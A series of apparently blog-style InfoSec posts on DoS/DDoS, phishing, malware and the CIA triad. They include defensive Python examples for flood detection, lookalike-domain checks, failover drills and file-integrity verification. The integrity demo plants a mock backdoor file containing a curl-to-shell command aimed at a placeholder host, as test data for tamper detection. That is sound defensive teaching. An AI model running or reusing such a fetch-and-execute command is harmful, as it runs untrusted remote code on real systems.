Category: InfoSec


Information Security Threats: DOS and DDOS

As part of this series on information security, we’ve been talking about the types of threats. We covered types of malware, types of phishing, and today we’re going to cover the types of denial of service attacks.

In our modern world where everything is connected to the Internet, the threat of cyber attacks looms large. Among the most disruptive of these are Denial of Service (DoS) and Distributed Denial of Service (DDoS) attacks. Let’s delve into what these attacks are and how they work.

What is a DoS Attack?

A Denial of Service attack is a malicious attempt to disrupt the normal traffic of a targeted server, service, or network by overwhelming the target or its surrounding infrastructure with a flood of Internet traffic. A plain DoS attack comes from a single Internet-connected device, like one computer, which floods the target with requests until it can no longer process normal traffic.

The Mechanics Behind a DoS Attack

  1. Finding a Weak Point: The attacker identifies something about the target that can be exhausted or broken. Sometimes this is an actual software bug, such as a malformed packet that crashes a service, but it is often just a resource limit: a web server that runs out of worker processes, memory, or connection slots when it receives too many requests.
  2. Flood of Requests: The attacker then sends more requests than the server can handle. Think of a mailbox so stuffed with letters that no new ones can be delivered.
  3. Service Disruption: As a result, the server cannot handle legitimate requests, and regular users are denied service.

What is a DDoS Attack?

A Distributed Denial of Service (DDoS) attack is a more complex, powerful version of the DoS attack. Here, the attack is launched from multiple compromised devices, often distributed globally. These networks of compromised devices are known as botnets.

Understanding DDoS Attacks

  1. Building a Botnet: Attackers infect multiple devices with malware, turning them into bots. These devices can range from computers to IoT devices. You might think that you’re safe because “who would want your information?”. The truth is that your computer, computing power, and bandwidth are still a pretty valuable commodity.
  2. Coordinated Attack: The attacker then uses this botnet to send a massive number of requests to the target simultaneously.
  3. Magnified Impact: The distributed nature of this attack makes it more difficult to stop since it comes from multiple sources and can generate more traffic than a single source. Stopping it isn’t as simple as blocking an IP Address or IP Range.

The Implications of DoS and DDoS Attacks

The impact of these attacks can be extensive. Businesses can experience service disruptions, financial losses, and damage to their reputation. In severe cases, critical online services like banking, healthcare, or government services can be affected.

Protecting Against DoS and DDoS Attacks

  • Robust Infrastructure: Organizations should invest in robust server infrastructure that can handle high traffic volumes.
  • Security Measures: Implement security measures like firewalls – including next-generation firewalls (NGFW) – and intrusion detection and prevention systems (IDS/IPS) to identify and block attack traffic, and rate-limit requests per client at the edge. Keep in mind that once a volumetric attack is saturating your Internet link, no device inside your network can help; for that you need your ISP or a cloud-based DDoS mitigation or CDN service that can absorb the flood upstream.
  • Monitor Traffic: Regular monitoring of network traffic, against a baseline of what normal looks like for you, helps with early detection of unusual patterns that signify an attack.
  • Response Plan: Have a clear response plan in place, including who to contact at your ISP or mitigation provider, so you can quickly address and mitigate the impact of an attack.
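As an added example (not code from the original post), here is the kind of log analysis the Monitor Traffic bullet is talking about, run over constructed access-log lines rather than real traffic. It buckets requests into ten-second windows and shows the difference between a single-source flood, where one address stands out and can be blocked, and a distributed one, where every bot stays under the per-IP limit and only the aggregate gives it away. The window size and thresholds are assumed values, not anything the post prescribes.

```python
"""Spot floods in web-server access logs, single-source and distributed.

Added example, not code from the original post. The access-log lines are
constructed by build_sample_log(); the window size and thresholds are
assumed values you would replace with your own baseline.
"""
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta, timezone

# Common Log Format prefix: <ip> - - [<timestamp>] "<request>" <status> ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "[^"]*" (?P<status>\d{3})')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return (client_ip, timestamp) or None for lines that don't match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return m.group("ip"), datetime.strptime(m.group("ts"), TS_FMT)


def analyze(lines, window_seconds=10, per_ip_limit=100, total_limit=500):
    """Bucket requests into fixed windows and classify each window.

    'single-source': at least one IP alone exceeded per_ip_limit (block it).
    'distributed':   nobody exceeded per_ip_limit, yet the window total is
                     over total_limit, so per-IP blocking buys nothing.
    'normal':        neither condition holds.
    """
    per_window = defaultdict(Counter)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, ts = parsed
        per_window[int(ts.timestamp()) // window_seconds][ip] += 1

    report = []
    for bucket in sorted(per_window):
        counts = per_window[bucket]
        total = sum(counts.values())
        loud_ips = sorted(ip for ip, n in counts.items() if n > per_ip_limit)
        if loud_ips:
            kind = "single-source"
        elif total > total_limit:
            kind = "distributed"
        else:
            kind = "normal"
        report.append({"window": bucket, "total": total, "sources": len(counts),
                       "loud_ips": loud_ips, "kind": kind})
    return report


def build_sample_log():
    """Constructed traffic, three 10-second windows (not real log data)."""
    base = datetime(2024, 1, 10, 12, 0, 0, tzinfo=timezone.utc)
    lines = []

    def add(ip, offset):
        t = base + timedelta(seconds=offset)
        lines.append(f'{ip} - - [{t.strftime(TS_FMT)}] "GET / HTTP/1.1" 200 512')

    # window 0 (0-9 s): 20 ordinary clients making 3 requests each
    for i in range(20):
        for j in range(3):
            add(f"198.51.100.{i + 1}", j)
    # window 1 (10-19 s): same clients plus one attacker firing 300 requests
    for i in range(20):
        add(f"198.51.100.{i + 1}", 12)
    for k in range(300):
        add("203.0.113.7", 10 + k % 10)
    # window 2 (20-29 s): 60 bots at 10 requests each, none over the per-IP limit
    for b in range(60):
        for k in range(10):
            add(f"192.0.2.{b + 1}", 20 + k)
    lines.append("not a log line at all")  # exercises the parser's reject path
    return lines


if __name__ == "__main__":
    for w in analyze(build_sample_log()):
        print(f"window {w['window']}: {w['total']:4d} requests from "
              f"{w['sources']:3d} sources -> {w['kind']} {w['loud_ips']}")
```

In the distributed window no single address exceeds the per-IP limit, which is exactly why blocking an IP or range is not enough: the signal is the total rate and the source count, and the mitigation has to happen upstream. The fixed thresholds are only illustrative; in practice you compare against a baseline of your own normal traffic, because a promotion or a viral link can produce the same numbers without any attacker.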

Aside from ransomware, DoS and DDoS attacks represent some of the most significant threats to network environments today. They are capable of bringing down websites and other services. Understanding these attacks is the first step in defending against them, and it is crucial for individuals and organizations alike to be aware of these threats and to take proactive measures to protect their digital assets.


Information Security Threats: Phishing, Whaling, etc

Phishing has become a household term in recent years, and for good reason. There are news stories about it, mandatory corporate training to keep you from falling for it, and it still remains prevalent and a fruitful way for the “bad guys” to succeed. So what is phishing? Phishing represents a range of techniques used by cybercriminals to deceive individuals into divulging sensitive information. Phishing now comes in many forms. And just like every political scandal gets -gate added as a suffix because of Watergate (Gamergate, Chinagate, Emailgate, Russiagate, etc), each of these forms of phishing gets the -ishing suffix. Clever, right?

Phishing: Your Inbox is the Battleground

The OG: phishing is the most common form of cyber deceit. It involves sending mass emails that appear to come from reputable sources, such as banks or popular websites, with the goal of stealing sensitive data like login credentials or credit card numbers. These emails often create a sense of urgency, prompting you to act quickly in the hope that you won’t do your due diligence. Typically, the sender address will appear to come from a safe domain but will be just slightly wrong. Some common examples are things like goolge.com instead of google.com or gimletrnedia.com instead of gimletmedia.com (the “rn” reads as “m” in many fonts). Even if they don’t bother to make the sender look legitimate, the form you get sent might be hosted on a domain set up with those tactics. Another trick is to use a very long hostname like secure.google.com.hacker.co/blah/blah/etc.php; people notice the “google.com” portion and miss that the actual domain is “hacker.co”, because the domain someone owns is read from the right-hand end of the hostname, not the left. These people will make exact duplicates of a Google, Microsoft, Amazon, or bank login screen and then steal your credentials. Where possible, the smart ones will even pass those credentials on to the real site and get you logged in so you’re none the wiser, which also means any one-time code you typed in along the way was relayed right along with your password.

Protection Tip: Always verify the sender’s email address and be wary of emails that demand immediate action. Legitimate organizations won’t ask for sensitive information via email.
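The lookalike tricks above are mechanical enough to check by machine. The following is an added example, not the post's code, of a link checker that applies three of them: it reads the registrable domain from the right-hand end of the hostname so that secure.google.com.hacker.co resolves to hacker.co, normalizes homoglyph sequences such as “rn” for “m”, and measures edit distance to catch goolge.com. The TRUSTED allowlist, the two-label domain rule, the homoglyph pairs and the distance threshold are all assumptions chosen for the demo.

```python
"""Classify link targets for the lookalike-domain tricks described above.

Added example, not code from the original post. The TRUSTED set, the
two-label rule for the registrable domain, the homoglyph pairs and the
distance threshold are all assumptions chosen for this demo.
"""
from urllib.parse import urlsplit

TRUSTED = {"google.com", "gimletmedia.com", "microsoft.com"}

# Character sequences that look like another letter in many fonts.
HOMOGLYPH_PAIRS = [("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l")]


def registrable_domain(hostname):
    """The part the attacker actually owns, read from the right:
    'secure.google.com.hacker.co' -> 'hacker.co'.
    Assumption: two-label suffixes only. Real code should consult the
    Public Suffix List so that e.g. 'example.co.uk' is handled."""
    labels = hostname.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def levenshtein(a, b):
    """Edit distance between two strings (catches 'goolge' vs 'google')."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def normalize_homoglyphs(domain):
    for fake, real in HOMOGLYPH_PAIRS:
        domain = domain.replace(fake, real)
    return domain


def classify_url(url, max_distance=2):
    """Return (verdict, registrable_domain).

    'trusted'            registrable domain is on the allowlist
    'lookalike'          typo-squat or homoglyph of a trusted name
    'brand-in-subdomain' trusted name appears in the host, but the
                         registrable domain belongs to someone else
    'unknown'            none of the above (not necessarily safe)
    """
    if "://" not in url:
        url = "http://" + url
    host = (urlsplit(url).hostname or "").lower()
    domain = registrable_domain(host)
    if domain in TRUSTED:
        return "trusted", domain
    label = domain.split(".")[0]
    for good in TRUSTED:
        good_label = good.split(".")[0]
        if normalize_homoglyphs(domain) == good:
            return "lookalike", domain
        if len(good_label) >= 5 and levenshtein(label, good_label) <= max_distance:
            return "lookalike", domain
    for good in TRUSTED:
        if good in host:
            return "brand-in-subdomain", domain
    return "unknown", domain


if __name__ == "__main__":
    for u in ("https://accounts.google.com/signin",
              "http://goolge.com/login",
              "https://gimletrnedia.com/",
              "https://secure.google.com.hacker.co/blah/blah/etc.php",
              "https://example.org/"):
        print(f"{u:60s} {classify_url(u)}")
```

An 'unknown' verdict is not a clean bill of health, only the absence of these particular tricks. A real filter would also consult the Public Suffix List, since the two-label rule misreads domains like example.co.uk, and would handle Unicode lookalikes, which this ASCII-only version ignores.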

Spear Phishing: Targeted Attacks

Spear phishing is a more targeted version of phishing, so named because the same tactics are used as in phishing except that the target is very deliberate. This is the difference between dropping a fishing line in the water to catch “any fish that swims by” vs spear fishing and jabbing a spear into the water to catch “this exact fish”. With spear phishing, the attacker personalizes the email to fit the recipient – using your name, job title, or other personal information – making the fraudulent communication seem more credible. Often, these emails might even seem to come from a higher-up in the company who needs you to wire money to a vendor urgently, or review this document immediately (behind a phishing lure).

Protection Tip: Be cautious with the amount of personal information you share online. Regularly update your privacy settings on social media and professional platforms. Open Source Intelligence (OSINT) is the key way that attackers learn this information about you to make it seem like they know you or already are in your organization.

Whaling: Going After the Big Fish

We’re keeping the metaphor going here with Whaling. Traditionally, whaling is done with harpoons (and what are harpoons but basically large spears?!?). Whaling attacks are Spear Phishing attacks that specifically target high-profile individuals like CEOs or CFOs. The emails mimic critical business communications, often involving legal or financial matters, to trick the victim into transferring funds or revealing sensitive corporate information.

Protection Tip: High-ranking individuals should be extra vigilant. Double-check the source of unexpected requests and verify through direct, secure communication channels. If possible, have the IT department put extra protection around the email accounts of key figures. Many business email providers offer this protection (Microsoft Defender for Office 365 offers priority account protection, for instance).

Vishing: The Voice of Deception

Now we’ve stopped being clever and have ventured into the “Russiagate” level of naming: we have lost the metaphor and are instead heading for the land of portmanteaus. Vishing, or voice phishing, involves phone calls instead of emails. The caller impersonates a trusted authority to extract personal information or financial details. If users aren’t trained well or if your organization doesn’t have the right protocols around verifying a caller, this can be an easy way to get too much information. I’ve done this myself when one of my accounts with a retailer was used without authorization. I called up and couldn’t get an answer, but I was able to get a few things from the phone agent that they didn’t mind sharing. Then I called back and had my original information plus this other information, and the person on the other end of the line assumed that because I knew so much already, I must be okay to know more about the transaction. Attackers especially skilled in building trust and using social manipulation can move mountains this way.

Protection Tip: Be skeptical of unsolicited phone calls. If in doubt, hang up and contact the organization directly using an official number.

Smishing: SMS-Based Scams

Another portmanteau: smishing is phishing carried out through SMS text messages. These messages may contain malicious links or request personal information. You have probably received some recently. USPS wants to tell you that you have a package that can’t be delivered. The IRS wants to talk to you about your huge overdue tax bill. Your bank wants to confirm your information. None of this is something that would happen or be communicated this way unexpectedly. Never follow a link in a text; instead go to the actual site and log in. Any legitimate messages for you will be there when you arrive. If you’re still in doubt, call the company using a phone number from their verified web page or a trusted directory and confirm the message. Otherwise, you’re asking for trouble.

Protection Tip: Avoid clicking on links in text messages from unknown sources. Install a reputable security app on your phone to filter out potential scams.

In the current world of online threats, knowledge and familiarity are your best defense. By understanding these tactics and adopting cautious online behaviors, you can significantly reduce the risk of falling victim to these increasingly sophisticated scams. Remember, cybersecurity is a continuous process. Regularly updating your software, using strong, unique passwords, and being mindful of the information you share online are crucial steps in protecting yourself and your data.

Stay informed, stay skeptical, and stay safe.


Information Security Threats: Malware

We’ve been talking about the CIA Triad, which is a shorthand for what it is that we’re trying to defend with our security practices. Now that we understand what’s at stake, we’re going to spend the next few posts talking about how various threats try to take out one or more of those legs. In this post, we’re going to talk about malware.

Malware, which is a portmanteau of “malicious software,” encompasses a broad range of software intentionally designed to harm, exploit, or disrupt computers, networks, servers, and computer systems. This includes a variety of forms such as viruses, worms, trojan horses, ransomware, spyware, adware, and more. Each type of malware has its unique mode of infection and impact, ranging from stealing sensitive information, damaging system operations, to hijacking core computing functions for malicious intent. The significance of understanding and guarding against malware cannot be overstated.

In our increasingly digital and interconnected world, where personal and professional lives are mixed with technology, malware poses a significant threat to individual privacy, financial security, and business operations. The growth of malware highlights the need for robust cybersecurity measures, regular system updates, cautious online behavior, and an informed understanding of digital threats. By recognizing the potential hazards of malware and taking proactive steps to protect against it, individuals and organizations can significantly reduce their vulnerability to these malicious threats.

1. Viruses

  • Definition: A virus is a type of malicious software that, when executed, replicates itself by modifying other computer programs and inserting its own code.
  • How it Works: When this replication succeeds, the affected areas are then said to be “infected”. Viruses often require a host program to be executed, such as a document or file.
  • Impact: They can perform various malicious tasks, such as stealing hard disk space or CPU time, accessing private information, corrupting data, displaying political or humorous messages on the user’s screen, spamming their email contacts, and even rendering the computer useless.

2. Worms: The Independent Malware

  • Definition: A worm is similar to a virus by design and is considered a sub-class of a virus. However, it differs in its function – it spreads across networks and computers without needing a host file.
  • How it Works: Worms exploit vulnerabilities in operating systems and software and are known for their capability to replicate themselves autonomously.
  • Impact: They often cause harm to their host networks by consuming bandwidth and overloading web servers. Worms can also carry payloads, which might steal data, delete files, or create botnets.

3. Trojans: The Deceptive Threat

  • Definition: A Trojan horse, or Trojan, is any malicious computer program which misleads users of its true intent.
  • How it Works: Unlike viruses and worms, Trojans do not replicate themselves but pose as legitimate software. Users are typically tricked by some form of social engineering into loading and executing Trojans on their systems.
  • Impact: Once activated, Trojans can enable cyber-criminals to spy on you, steal your sensitive data, and gain backdoor access to your system.

4. Ransomware: The Hostage-Taker

  • Definition: Normally, cryptography is defensive in nature: you encrypt things to keep them for “eyes only”. Cryptovirology is the use of cryptography in an offensive way, “infecting you with encryption” as it were. Ransomware is a type of malware that uses cryptovirology and threatens to publish the victim’s data or perpetually block access to it unless a ransom is paid.
  • How it Works: Some ransomware types encrypt files on the system’s hard drive (cryptoviral extortion), while others may simply lock the system and display messages intended to coerce the user into paying.
  • Impact: Ransomware attacks can lead to significant data loss and financial damages, both from the ransom paid and the downtime caused by the attack.

Understanding these various types of malware is the first step in protecting yourself and your organization from them. Always ensure you have updated antivirus software, practice safe browsing, and be cautious with emails and downloads. Awareness and preparedness are key in navigating the complex world of digital threats.


The CIA Triad: Availability

Previously, we’ve introduced the CIA Triad and the components of its acronym: Confidentiality, Integrity, and Availability. We’ve already covered Confidentiality and Integrity, this time we’re going to cover Availability.

In the trinity of information security principles, known as the CIA Triad, ‘Availability’ is the leg that is most easily attacked by “script kiddies” and most easily ruined by our own success. Today, let’s unravel what Availability means in information security, its real-world significance, and the fallout when it’s compromised.

Understanding Availability

In the context of information security, Availability refers to ensuring that information and resources are accessible to authorized users when needed. It’s not just about having data; it’s about having data ready for use, unhindered by obstacles like system failures, cyberattacks, or natural disasters.

Ensuring Availability

Redundant Systems
These are backup systems that kick in when the primary system fails, ensuring continuous access to data. This is what saves you when the primary system dies, whether from a hardware fault or anything else. Can your active system switch over to another hot system, a warm standby, or even a cold site? How quickly? That last answer is your recovery time objective, and you should know it before you need it.
Regular Maintenance and Updates
Keeping systems updated and well-maintained prevents downtime caused by software or hardware issues. The best way to stay out of trouble is to avoid trouble. You need to make sure you’re patched and your equipment is running well, and to rely on things like SMART for hard drive health. This is also where knowing metrics like MTTF (Mean Time to Failure) matters. If you have components that are coming up on their expected service life, you need to start mitigating now.
Disaster Recovery Plans
Preparing for the worst – from cyberattacks to natural disasters – to ensure rapid restoration of services. What do you do if something happens to an entire site? That can mean your local power grid if you’re self-hosting, or issues with cloud regions with the big providers (it happens… more than we’d like!). Just like with Redundant Systems, you should have Redundancy at both the micro and macro level for your system.

Real-World Examples

E-Commerce Platforms
Imagine an e-commerce site crashing on Black Friday. The lack of availability can lead to significant financial loss and customer dissatisfaction. Not every “scale-based” outage is a Denial of Service (DoS) or Distributed Denial of Service (DDoS) attack. Sometimes you DoS yourself by running a huge promotion, or you get squished by going viral on a site like Reddit.
Healthcare Systems
In healthcare, system availability can be a matter of life and death. If medical staff can’t access patient records promptly, patient care could be compromised. This is true at every leg of the chain. You don’t have to look too far into the past to remember the Healthcare.gov debacle where literally hundreds of millions of dollars were spent on a site that couldn’t stand up to everyone trying to sign up for “Obamacare”. You’d think those millions could buy you a few people who had worked at Facebook, Twitter, Reddit, Netflix, or somewhere where they might have had an idea how to ensure Availability through hard-learned lessons, but apparently not.
Banking Services
If an online banking platform is unavailable, customers cannot perform transactions, leading to frustration and potential financial complications. We just take this one for granted because banks have gotten so good at this, but imagine if you went to the store and tried to use your card and your bank (and just your bank) wasn’t playing ball today. I’ve been in stores where the “Credit Card Machine” was down, but I can’t think of one time that I couldn’t use my banking features due to my bank having an issue. I’m not saying it never happens, but this might just be the rarest version of this because they take Availability very seriously.

The Consequences of Poor Availability

When systems aren’t available, the consequences can be dire. We covered that a little bit with the real world examples, but here are some consequences boiled down:

Loss of Revenue
For businesses, downtime often translates directly into lost revenue, especially for services that depend on continuous online presence.
Damaged Reputation
Customers expect reliability. Frequent downtimes can tarnish an organization’s reputation and erode trust.
Operational Disruption
In sectors like manufacturing or logistics, lack of availability in information systems can lead to halted production lines or disrupted supply chains.

Protecting Against Availability Threats

To safeguard against threats to availability, organizations should:

Invest in Robust Infrastructure
This includes not only having backup systems but also ensuring that the infrastructure can handle high loads and resist cyberattacks. This one can be expensive, so a lot of people short change it at the beginning of their journey. “I can barely afford one server, how can I afford to pay for a second one I may never need?” I get it… but accepting a risk doesn’t make it go away. This is one that you’ll want to mitigate as soon as possible.
Implement Effective Monitoring Systems
These systems can alert administrators to potential issues before they cause downtime. Have you ever wondered what people are doing in Network Operations Centers (NOCs) and Security Operations Centers (SOCs)? This. They are doing this. They are keeping their fingers on the pulse of all of the logs and metrics behind the systems, hoping to find signs of intrusions and failures and to prevent them or respond as soon as possible.
Regularly Test Recovery Procedures
Regular testing ensures that, in the event of a system failure, the recovery processes are effective and efficient. Netflix has their Chaos Monkey code that just randomly shuts stuff off to ensure they can handle that happening regularly. They were the first company I heard of doing such a thing. They’ve since open-sourced it to share with others to potentially make everyone stronger. According to them, “Chaos Monkey randomly terminates virtual machine instances and containers that run inside of your production environment. Exposing engineers to failures more frequently incentivizes them to build resilient services.” Yep.
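The redundancy question from the Redundant Systems item (can the active system switch to a standby, and how quickly?) and the Chaos Monkey idea above can be shown in one small simulation. This is an added example, not code from the post or from Netflix: the backends are in-memory stand-ins, an unhealthy one raises ConnectionError the way a timed-out connection would, and the chaos drill randomly knocks backends up and down while checking that every request is still served.

```python
"""Failover across redundant backends, plus a chaos drill that knocks them out at random.

Added example, not code from the original post or from Netflix's Chaos Monkey.
The backends are in-memory fakes (no network, no real outages); an unhealthy
backend simply raises ConnectionError the way a timed-out socket would.
"""
import random


class Backend:
    """Stand-in for one server or site; flip `healthy` to simulate an outage."""

    def __init__(self, name, healthy=True):
        self.name = name
        self.healthy = healthy
        self.calls = 0

    def handle(self, request):
        self.calls += 1
        if not self.healthy:
            raise ConnectionError(f"{self.name} is down")
        return f"{self.name} served {request}"


class FailoverClient:
    """Try backends in order; stick with whichever last answered so a dead
    primary is not re-probed on every request once we have failed over."""

    def __init__(self, backends):
        self.backends = list(backends)
        self.preferred = None  # name of the backend that last answered

    def _order(self):
        if self.preferred is None:
            return list(self.backends)
        # sorted() is stable: preferred first, the rest keep priority order
        return sorted(self.backends, key=lambda b: b.name != self.preferred)

    def request(self, payload):
        errors = []
        for backend in self._order():
            try:
                result = backend.handle(payload)
            except ConnectionError as exc:
                errors.append(str(exc))
                continue
            self.preferred = backend.name
            return result
        raise RuntimeError("all backends failed: " + "; ".join(errors))


def chaos_drill(client, rounds=200, flip_probability=0.3, seed=1):
    """Chaos-Monkey-style test: each round randomly flips backends between up
    and down, then makes a request. One backend is always left alive, because
    'every site is gone at once' is a different drill (disaster recovery).
    Returns (served, failed); with working redundancy, failed should be 0."""
    rng = random.Random(seed)
    served = failed = 0
    for i in range(rounds):
        for backend in client.backends:
            if rng.random() < flip_probability:
                backend.healthy = not backend.healthy
        if not any(b.healthy for b in client.backends):
            rng.choice(client.backends).healthy = True
        try:
            client.request(f"req-{i}")
            served += 1
        except RuntimeError:
            failed += 1
    return served, failed


def scripted_failover():
    """Deterministic walk-through: primary dies, traffic moves to the
    secondary, and stays there even after the primary comes back."""
    primary, secondary = Backend("primary"), Backend("secondary")
    client = FailoverClient([primary, secondary])
    trace = [client.request("a")]          # primary answers
    primary.healthy = False
    trace.append(client.request("b"))      # primary fails once, secondary answers
    primary.healthy = True
    trace.append(client.request("c"))      # still on secondary (sticky)
    secondary.healthy = False
    trace.append(client.request("d"))      # back to primary
    return trace, primary.calls, secondary.calls


if __name__ == "__main__":
    print(scripted_failover())
    drill = FailoverClient([Backend("us-east"), Backend("us-west"), Backend("eu-central")])
    print("chaos drill (served, failed):", chaos_drill(drill))
```

The drill always leaves one backend alive, because “every site is gone” is the disaster-recovery case, not the redundancy case. The sticky preference avoids hammering a dead primary on every request; the trade-off is that traffic stays on the standby after the primary recovers until the standby itself fails, which may or may not be what you want.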

Conclusion

The ‘A’ in the CIA Triad – Availability – is a crucial component of information security. In our interconnected world, where we depend on instant access to information, ensuring that this information is readily available is as important as keeping it secure and intact. Knowing how to keep your systems running in the face of all that the world has to throw at you is vitally important and something you need to consider with your technology decisions.


The CIA Triad: Integrity

Previously, we’ve introduced the CIA Triad and the components of its acronym: Confidentiality, Integrity, and Availability. We’ve already covered Confidentiality and this time we’re going to cover the often overlooked Integrity.

In the world of information security, the CIA Triad is a model designed to guide policies for information security within an organization. While Confidentiality and Availability often steal the spotlight, today, we’re focusing on the often-understated ‘I’ of the triad: Integrity. It’s all about maintaining the trustworthiness and accuracy of data. Let’s explore why Integrity is pivotal and the real-world implications when it’s compromised.

What is Data Integrity?

Data Integrity in information security refers to the reliability and trustworthiness of data throughout its lifecycle. It’s about ensuring that information remains unaltered from its source to destination as well as during storage, retrieval, and processing.

Means of Ensuring Data Integrity

Here are some of the practical ways that we can ensure data integrity:

Hashing and Checksums
These are mathematical algorithms that produce a fixed-size digital fingerprint of data. Any alteration to the data changes this fingerprint, indicating a potential compromise. For sensitive files, you create a checksum when the file is created and publish it; when you download the file or access it again, you recompute the checksum and see if the two match. This is very common when downloading software from reputable sites. Two caveats: use a cryptographic hash such as SHA-256 (MD5 and SHA-1 can be deliberately collided, so they won’t stop a motivated attacker), and remember that a checksum published right next to the file on the same server can be replaced along with it, so the checksum needs to come from a separate trusted channel or be digitally signed.
Access Controls
Limiting who can alter data ensures that only authorized personnel can make changes, reducing the risk of malicious alterations. This one can be a little less obvious, but basically it is a lot harder to add an article to NYTimes.com than it is to edit a Wikipedia page or publish a post on Reddit. That helps ensure that NYTimes.com contains only the information the owners want it to and that it isn’t changed to represent something different from that.
Version Control Systems
These systems track changes to documents or codebases, allowing the recovery of earlier versions if unauthorized changes are detected. If you’re a software developer, this isn’t only Git or the equivalent. This also includes Track Changes in MS Word and file versioning inside something like Dropbox or SharePoint. Because every change is tracked and the details are recorded, it is less likely that a change can go unnoticed, or that it would become irrevocable.

Real-World Examples

When and how would we see this in play? And why would we care in our personal lives? Consider:

Financial Transactions
Imagine transferring money online, but the transaction details are altered, sending your funds to a hacker’s account. If integrity checks didn’t exist along the way, no one would know where the transfer went or that it wasn’t your original intention. Integrity controls in banking systems are crucial to prevent such occurrences.
Healthcare Records
A patient’s treatment plan is based on their medical history. If this data is altered, it could lead to incorrect treatments, posing serious health risks. If there were no integrity around the records, imagine the disaster that could occur if a malicious agent removed deadly allergies from a patient’s file. The patient could easily die.
Legal Evidence
In legal proceedings, the integrity of evidence is paramount. Any tampering with digital evidence can lead to wrongful convictions or acquittals. This is the same deal as the Healthcare Records. What if someone could create/update/delete evidence or even just tamper with the chain of custody documents to have the evidence thrown out?

The Consequences of Compromised Integrity

When data integrity is breached, the results can be catastrophic:

Financial Loss
In the business world, altered data can lead to incorrect financial decisions, affecting a company’s bottom line. You could topple markets if you could change the data in financial reports published to the market.
Mistrust and Reputation Damage
When data integrity is compromised, it can erode trust in an organization, damaging its reputation and leading to loss of customers or partners. How long would you stay with an organization that greeted you by the wrong name when you signed in, showed the wrong order history, and the wrong demographics? Or if the doctor discussed procedures or diagnoses that never occurred? You’d be out in a minute, talking bad about them to anyone who would listen!
Legal and Compliance Issues
Many industries have regulatory requirements for data integrity. Violations can lead to legal penalties and fines. Imagine if SEC reports, EPA reports, and OSHA reports all contained incomplete or erroneous data. Someone would be on Larry King in a bad way.

Protecting Against Integrity Threats

So now we know what can happen if we do it wrong, but how do we do it the right way? Protecting the integrity of data involves:

Regular Audits and Monitoring
Regular checks can detect and rectify any integrity issues before they escalate. This assumes that you know the “truth” to compare things to. This includes looking for data changes, unauthorized file access, revisiting permissions regularly, and taking Blue Teaming seriously.
Education and Awareness
Training staff on the importance of data integrity and the risks associated with data tampering. People don’t know what they don’t know. You have to make sure your staff is aware that this is important and that they follow procedures around Integrity.
Implementing Robust Security Protocols
This includes integrity protection for your data – a digital signature or authenticated encryption, since plain encryption keeps data secret but does not by itself prove it hasn’t been altered – along with robust access controls and secure backup systems.
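An added example, not the post's code, covering both the checksum workflow from Hashing and Checksums and the “know the truth to compare to” point under Regular Audits and Monitoring. It hashes files with SHA-256, verifies them against a sha256sum-style manifest, takes a baseline snapshot of a directory, and then rescans after a simulated tampering to report what was added, removed or modified. The files, manifest and tampering are all constructed inside a temporary directory; the manifest layout is an assumption.

```python
"""Checksum verification and a baseline-vs-rescan integrity check.

Added example, not code from the original post. Files are created in a
temporary directory by demo(); the manifest format copies the common
`sha256sum` layout ("<hex digest>  <file name>"), which is an assumption.
"""
import hashlib
import hmac
import tempfile
from pathlib import Path


def sha256_file(path, chunk_size=1 << 16):
    """Hash a file in chunks so large files don't need to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk_size), b""):
            digest.update(block)
    return digest.hexdigest()


def parse_manifest(text):
    """'<hex>  <name>' per line -> {name: hex}; tolerates sha256sum's '*' binary marker."""
    entries = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        digest, _, name = line.partition("  ")
        entries[name.lstrip("*")] = digest.lower()
    return entries


def verify_manifest(directory, manifest_text):
    """Return {name: 'ok' | 'MISMATCH' | 'MISSING'} for every manifest entry."""
    results = {}
    for name, expected in parse_manifest(manifest_text).items():
        path = Path(directory) / name
        if not path.is_file():
            results[name] = "MISSING"
        elif hmac.compare_digest(sha256_file(path), expected):
            results[name] = "ok"
        else:
            results[name] = "MISMATCH"
    return results


def snapshot(directory):
    """Baseline for audits: {relative path: sha256} for every file in the tree."""
    base = Path(directory)
    return {str(p.relative_to(base)): sha256_file(p)
            for p in sorted(base.rglob("*")) if p.is_file()}


def diff_snapshots(before, after):
    """What changed since the baseline, i.e. the 'truth' to compare against."""
    return {
        "added": sorted(set(after) - set(before)),
        "removed": sorted(set(before) - set(after)),
        "modified": sorted(n for n in before.keys() & after.keys() if before[n] != after[n]),
    }


def demo():
    """Constructed scenario: publish a release, then tamper with it."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "installer.bin").write_bytes(b"\x7fELF pretend-binary v1")
        (root / "README").write_text("release notes\n")
        manifest = "\n".join(f"{sha256_file(root / n)}  {n}" for n in ("installer.bin", "README"))
        manifest += "\n" + "0" * 64 + "  CHANGELOG"   # listed but never shipped
        baseline = snapshot(root)
        clean = verify_manifest(root, manifest)

        # The attacker replaces the binary and drops an extra file; README is untouched.
        (root / "installer.bin").write_bytes(b"\x7fELF pretend-binary v1 plus backdoor")
        (root / "backdoor.sh").write_text("curl http://evil.invalid/x | sh\n")
        tampered = verify_manifest(root, manifest)
        changes = diff_snapshots(baseline, snapshot(root))
        return clean, tampered, changes


if __name__ == "__main__":
    for label, result in zip(("clean", "tampered", "changes"), demo()):
        print(label, result)
```

Two things to keep in mind: the manifest (or the baseline) is the source of truth, so it has to be stored or signed somewhere the person who could tamper with the files cannot reach, and hmac.compare_digest is used for the comparison so the check does not leak, through timing, how much of the digest matched.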

The integrity of data is a cornerstone of information security. As more and more of our personal and professional lives are online, the accuracy and reliability of our data are more critical than ever. Understanding its importance, implementing measures to protect it, and being vigilant about potential threats are key steps in safeguarding the integrity of our information.

